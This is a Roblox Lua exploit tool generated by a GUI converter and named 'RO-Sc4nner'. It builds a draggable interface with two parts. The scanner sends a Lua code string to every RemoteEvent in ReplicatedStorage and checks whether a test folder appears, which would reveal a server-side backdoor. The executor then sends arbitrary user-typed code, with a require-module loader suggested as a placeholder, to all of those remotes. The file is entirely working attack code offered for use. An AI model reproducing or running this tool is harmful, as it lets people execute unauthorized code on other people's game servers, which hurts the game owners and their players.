--[=[
 d888b  db    db d888888b      .d888b.      db      db    db  .d8b.  
88' Y8b 88    88   `88'        VP  `8D      88      88    88 d8' `8b 
88      88    88    88            odD'      88      88    88 88ooo88 
88  ooo 88    88    88          .88'        88      88    88 88~~~88 
88. ~8~ 88b  d88   .88.        j88.         88booo. 88b  d88 88   88    @uniquadev
 Y888P  ~Y8888P' Y888888P      888888D      Y88888P ~Y8888P' YP   YP  CONVERTER 
]=]

-- Instances: 23 | Scripts: 4 | Modules: 0 | Tags: 0
local G2L = {};

-- StarterGui.RO-Sc4nner.1
G2L["1"] = Instance.new("ScreenGui", game:GetService("Players").LocalPlayer:WaitForChild("PlayerGui"));
G2L["1"]["Name"] = [[RO-Sc4nner.1]];
G2L["1"]["ZIndexBehavior"] = Enum.ZIndexBehavior.Sibling;
G2L["1"]["ResetOnSpawn"] = false;


-- StarterGui.RO-Sc4nner.1.Main
G2L["2"] = Instance.new("Frame", G2L["1"]);
G2L["2"]["BorderSizePixel"] = 0;
G2L["2"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["2"]["Size"] = UDim2.new(0, 432, 0, 304);
G2L["2"]["Position"] = UDim2.new(0.25227, 0, 0.2567, 0);
G2L["2"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["2"]["Name"] = [[Main]];
G2L["2"]["BackgroundTransparency"] = 1;


-- StarterGui.RO-Sc4nner.1.Main.Dragify
G2L["3"] = Instance.new("LocalScript", G2L["2"]);
G2L["3"]["Name"] = [[Dragify]];


-- StarterGui.RO-Sc4nner.1.Main.B4ckdoor
G2L["4"] = Instance.new("Frame", G2L["2"]);
G2L["4"]["Visible"] = false;
G2L["4"]["BorderSizePixel"] = 0;
G2L["4"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["4"]["Size"] = UDim2.new(0, 431, 0, 304);
G2L["4"]["Position"] = UDim2.new(0, 0, 0, 0);
G2L["4"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["4"]["Name"] = [[B4ckdoor]];


-- StarterGui.RO-Sc4nner.1.Main.B4ckdoor.UICorner
G2L["5"] = Instance.new("UICorner", G2L["4"]);
G2L["5"]["CornerRadius"] = UDim.new(0, 13);


-- StarterGui.RO-Sc4nner.1.Main.B4ckdoor.UIStroke
G2L["6"] = Instance.new("UIStroke", G2L["4"]);
G2L["6"]["Thickness"] = 3;
G2L["6"]["Color"] = Color3.fromRGB(255, 155, 66);


-- StarterGui.RO-Sc4nner.1.Main.B4ckdoor.Input
G2L["7"] = Instance.new("TextBox", G2L["4"]);
G2L["7"]["Name"] = [[Input]];
G2L["7"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["7"]["BorderSizePixel"] = 0;
G2L["7"]["TextSize"] = 14;
G2L["7"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["7"]["TextYAlignment"] = Enum.TextYAlignment.Top;
G2L["7"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["7"]["FontFace"] = Font.new([[rbxasset://fonts/families/Merriweather.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["7"]["MultiLine"] = true;
G2L["7"]["ClearTextOnFocus"] = false;
G2L["7"]["PlaceholderText"] = [[require(000000).load(1x1x1x1)]];
G2L["7"]["Size"] = UDim2.new(0, 296, 0, 281);
G2L["7"]["Position"] = UDim2.new(0.02552, 0, 0.03609, 0);
G2L["7"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["7"]["Text"] = [[]];


-- StarterGui.RO-Sc4nner.1.Main.B4ckdoor.Input.UIStroke
G2L["8"] = Instance.new("UIStroke", G2L["7"]);
G2L["8"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;
G2L["8"]["Color"] = Color3.fromRGB(255, 155, 66);


-- StarterGui.RO-Sc4nner.1.Main.B4ckdoor.Exec
G2L["9"] = Instance.new("TextButton", G2L["4"]);
G2L["9"]["BorderSizePixel"] = 0;
G2L["9"]["TextSize"] = 29;
G2L["9"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
G2L["9"]["BackgroundColor3"] = Color3.fromRGB(255, 56, 42);
G2L["9"]["FontFace"] = Font.new([[rbxasset://fonts/families/Merriweather.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["9"]["Size"] = UDim2.new(0, 105, 0, 102);
G2L["9"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["9"]["Text"] = [[Execute]];
G2L["9"]["Name"] = [[Exec]];
G2L["9"]["Position"] = UDim2.new(0.73085, 0, 0.03609, 0);


-- StarterGui.RO-Sc4nner.1.Main.B4ckdoor.Exec.LocalScript
G2L["a"] = Instance.new("LocalScript", G2L["9"]);



-- StarterGui.RO-Sc4nner.1.Main.B4ckdoor.Clear
G2L["b"] = Instance.new("TextButton", G2L["4"]);
G2L["b"]["BorderSizePixel"] = 0;
G2L["b"]["TextSize"] = 29;
G2L["b"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
G2L["b"]["BackgroundColor3"] = Color3.fromRGB(255, 56, 42);
G2L["b"]["FontFace"] = Font.new([[rbxasset://fonts/families/Merriweather.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["b"]["Size"] = UDim2.new(0, 105, 0, 102);
G2L["b"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["b"]["Text"] = [[Clear]];
G2L["b"]["Name"] = [[Clear]];
G2L["b"]["Position"] = UDim2.new(0.73085, 0, 0.41008, 0);


-- StarterGui.RO-Sc4nner.1.Main.B4ckdoor.Clear.LocalScript
G2L["c"] = Instance.new("LocalScript", G2L["b"]);



-- StarterGui.RO-Sc4nner.1.Main.Sc4nner
G2L["d"] = Instance.new("Frame", G2L["2"]);
G2L["d"]["BorderSizePixel"] = 0;
G2L["d"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["d"]["Size"] = UDim2.new(0, 431, 0, 304);
G2L["d"]["Position"] = UDim2.new(-0.00232, 0, -0.00327, 0);
G2L["d"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["d"]["Name"] = [[Sc4nner]];


-- StarterGui.RO-Sc4nner.1.Main.Sc4nner.UICorner
G2L["e"] = Instance.new("UICorner", G2L["d"]);
G2L["e"]["CornerRadius"] = UDim.new(0, 13);


-- StarterGui.RO-Sc4nner.1.Main.Sc4nner.UIStroke
G2L["f"] = Instance.new("UIStroke", G2L["d"]);
G2L["f"]["Thickness"] = 3;
G2L["f"]["Color"] = Color3.fromRGB(255, 155, 66);


-- StarterGui.RO-Sc4nner.1.Main.Sc4nner.Ccan
G2L["10"] = Instance.new("TextButton", G2L["d"]);
G2L["10"]["TextWrapped"] = true;
G2L["10"]["BorderSizePixel"] = 0;
G2L["10"]["TextSize"] = 14;
G2L["10"]["TextScaled"] = true;
G2L["10"]["TextColor3"] = Color3.fromRGB(253, 255, 80);
G2L["10"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["10"]["FontFace"] = Font.new([[rbxasset://fonts/families/Merriweather.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["10"]["Size"] = UDim2.new(0, 281, 0, 97);
G2L["10"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["10"]["Text"] = [[Scan]];
G2L["10"]["Name"] = [[Ccan]];
G2L["10"]["Position"] = UDim2.new(0.18094, 0, 0.34379, 0);


-- StarterGui.RO-Sc4nner.1.Main.Sc4nner.Ccan.LocalScript
G2L["11"] = Instance.new("LocalScript", G2L["10"]);



-- StarterGui.RO-Sc4nner.1.Main.Sc4nner.Ccan.UICorner
G2L["12"] = Instance.new("UICorner", G2L["10"]);
G2L["12"]["CornerRadius"] = UDim.new(0, 13);


-- StarterGui.RO-Sc4nner.1.Main.Sc4nner.Ccan.UIStroke
G2L["13"] = Instance.new("UIStroke", G2L["10"]);
G2L["13"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;
G2L["13"]["Thickness"] = 3;
G2L["13"]["Color"] = Color3.fromRGB(255, 155, 66);


-- StarterGui.RO-Sc4nner.1.Main.Sc4nner.TextLabel
G2L["14"] = Instance.new("TextLabel", G2L["d"]);
G2L["14"]["TextWrapped"] = true;
G2L["14"]["BorderSizePixel"] = 0;
G2L["14"]["TextSize"] = 14;
G2L["14"]["TextScaled"] = true;
G2L["14"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["14"]["FontFace"] = Font.new([[rbxasset://fonts/families/Merriweather.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["14"]["TextColor3"] = Color3.fromRGB(255, 255, 18);
G2L["14"]["BackgroundTransparency"] = 1;
G2L["14"]["Size"] = UDim2.new(0, 117, 0, 48);
G2L["14"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["14"]["Text"] = [[RO]];
G2L["14"]["Position"] = UDim2.new(0.2227, 0, 0.04584, 0);


-- StarterGui.RO-Sc4nner.1.Main.Sc4nner.TextLabel
G2L["15"] = Instance.new("TextLabel", G2L["d"]);
G2L["15"]["TextWrapped"] = true;
G2L["15"]["BorderSizePixel"] = 0;
G2L["15"]["TextSize"] = 14;
G2L["15"]["TextScaled"] = true;
G2L["15"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["15"]["FontFace"] = Font.new([[rbxasset://fonts/families/Merriweather.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["15"]["TextColor3"] = Color3.fromRGB(255, 191, 39);
G2L["15"]["BackgroundTransparency"] = 1;
G2L["15"]["Size"] = UDim2.new(0, 117, 0, 48);
G2L["15"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["15"]["Text"] = [[-]];
G2L["15"]["Position"] = UDim2.new(0.32012, 0, 0.04584, 0);


-- StarterGui.RO-Sc4nner.1.Main.Sc4nner.TextLabel
G2L["16"] = Instance.new("TextLabel", G2L["d"]);
G2L["16"]["BorderSizePixel"] = 0;
G2L["16"]["TextSize"] = 36;
G2L["16"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["16"]["FontFace"] = Font.new([[rbxasset://fonts/families/Merriweather.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["16"]["TextColor3"] = Color3.fromRGB(255, 70, 24);
G2L["16"]["BackgroundTransparency"] = 1;
G2L["16"]["Size"] = UDim2.new(0, 117, 0, 48);
G2L["16"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["16"]["Text"] = [[Sc4nner]];
G2L["16"]["Position"] = UDim2.new(0.48251, 0, 0.04584, 0);


-- StarterGui.RO-Sc4nner.1.Main.ImageLabel
G2L["17"] = Instance.new("ImageLabel", G2L["2"]);
G2L["17"]["BorderSizePixel"] = 0;
G2L["17"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
-- [ERROR] cannot convert ImageContent, please report to "https://github.com/uniquadev/GuiToLuaConverter/issues"
G2L["17"]["Image"] = [[rbxassetid://131650302510999]];
G2L["17"]["Size"] = UDim2.new(0, 100, 0, 98);
G2L["17"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["17"]["BackgroundTransparency"] = 1;
G2L["17"]["Position"] = UDim2.new(0.9279, 0, -0.203, 0);


-- StarterGui.RO-Sc4nner.1.Main.Dragify
local function C_3()
local script = G2L["3"];
	local UIS = game:GetService("UserInputService")
	local frame = script.Parent
	
	local dragToggle = nil
	local dragSpeed = 0.25
	local dragStart = nil
	local startPos = nil
	
	local function updateInput(input)
		local delta = input.Position - dragStart
		local position = UDim2.new(startPos.X.Scale,startPos.X.Offset + delta.X, startPos.Y.Scale, startPos.Y.Offset + delta.Y)
		game:GetService("TweenService"):Create(frame, TweenInfo.new(dragSpeed), {Position = position}):Play()
	end
	
	frame.InputBegan:Connect(function(input)
		if (input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch) then
			dragToggle = true
			dragStart = input.Position
			startPos = frame.Position
			input.Changed:Connect(function()
				if input.UserInputState == Enum.UserInputState.End then
					dragToggle = false
				end
			end)
		end
	end)
	
	UIS.InputChanged:Connect(function(input)
		if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then
			if dragToggle then
				updateInput(input)
			end
		end
	end)
end;
task.spawn(C_3);
-- StarterGui.RO-Sc4nner.1.Main.B4ckdoor.Exec.LocalScript
local function C_a()
local script = G2L["a"];
	local RS = game:GetService("ReplicatedStorage")
	
	local btn = script.Parent
	local gui = btn.Parent
	local input = gui:WaitForChild("Input")
	
	btn.MouseButton1Click:Connect(function()
		local payload = input.Text
		if payload == "" then return end
	
		for _, remote in ipairs(RS:GetDescendants()) do
			if remote:IsA("RemoteEvent") then
				pcall(function()
					remote:FireServer(payload)
				end)
			end
		end
		btn.Text = "Executed"
		task.wait(0.50)
		btn.Text = "Execute"
	end)
	
end;
task.spawn(C_a);
-- StarterGui.RO-Sc4nner.1.Main.B4ckdoor.Clear.LocalScript
local function C_c()
local script = G2L["c"];
	local btn = script.Parent
	local input = btn.Parent.Input
	
	btn.MouseButton1Click:Connect(function()
		input.Text = ""
		btn.Text = "Cleared"
		task.wait(0.50)
		btn.Text = "Clear"
	end)
end;
task.spawn(C_c);
-- StarterGui.RO-Sc4nner.1.Main.Sc4nner.Ccan.LocalScript
local function C_11()
local script = G2L["11"];
	local RS = game:GetService("ReplicatedStorage")
	local StarterGui = game:GetService("StarterGui")
	
	local btn = script.Parent
	local h = btn.Parent
	local gui = h.Parent:WaitForChild("B4ckdoor")
	
	local function genCode()
		return "RO_" .. math.random(100000,999999)
	end
	
	btn.MouseButton1Click:Connect(function()
		for _, remote in ipairs(RS:GetDescendants()) do
			if remote:IsA("RemoteEvent") then
	
				local code = genCode()
	
				
				pcall(function()
					remote:FireServer(
						"a=Instance.new('Folder',workspace) a.Name='"..code.."'"
					)
				end)
	
				
				task.wait(0.25)
	
				if workspace:FindFirstChild(code) then
					
					h.Visible = false
					gui.Visible = true
	
					local timeNow = os.date("%H:%M:%S")
					pcall(function()
						StarterGui:SetCore("SendNotification", {
							Title = "RO-Sc4nner",
							Text = "Time: "..timeNow,
							Duration = 6,
							Icon = "rbxassetid://131650302510999"
						})
					end)
				end
			end
		end
	end)
	
end;
task.spawn(C_11);

return G2L["1"], require;
